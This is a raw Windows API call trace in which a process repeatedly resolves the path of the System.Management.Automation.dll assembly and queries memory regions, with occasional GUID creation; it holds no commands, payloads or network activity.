	[0285.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.620] VirtualQuery (in: lpAddress=0x26bb50, lpBuffer=0x26ca10, dwLength=0x30 | out: lpBuffer=0x26ca10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.620] VirtualQuery (in: lpAddress=0x26bb50, lpBuffer=0x26ca10, dwLength=0x30 | out: lpBuffer=0x26ca10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.621] VirtualQuery (in: lpAddress=0x26bb50, lpBuffer=0x26ca10, dwLength=0x30 | out: lpBuffer=0x26ca10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.621] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.621] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.622] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.622] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.622] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.622] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.622] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.622] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.622] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.622] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.623] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.623] VirtualQuery (in: lpAddress=0x26b780, lpBuffer=0x26c640, dwLength=0x30 | out: lpBuffer=0x26c640*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.623] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.623] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.623] VirtualQuery (in: lpAddress=0x26bab0, lpBuffer=0x26c970, dwLength=0x30 | out: lpBuffer=0x26c970*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.623] VirtualQuery (in: lpAddress=0x26bb40, lpBuffer=0x26ca00, dwLength=0x30 | out: lpBuffer=0x26ca00*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.624] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x4e6e55bd, Data2=0xfa64, Data3=0x4493, Data4=([0]=0x8d, [1]=0x19, [2]=0xa5, [3]=0x1e, [4]=0xcd, [5]=0xac, [6]=0xcd, [7]=0xe1))) returned 0x0
	[0285.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.625] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x1806614e, Data2=0xf700, Data3=0x4697, Data4=([0]=0xae, [1]=0xf9, [2]=0x2e, [3]=0xc2, [4]=0xa8, [5]=0x4d, [6]=0xa1, [7]=0x64))) returned 0x0
	[0285.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.628] VirtualQuery (in: lpAddress=0x26b1b0, lpBuffer=0x26c070, dwLength=0x30 | out: lpBuffer=0x26c070*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
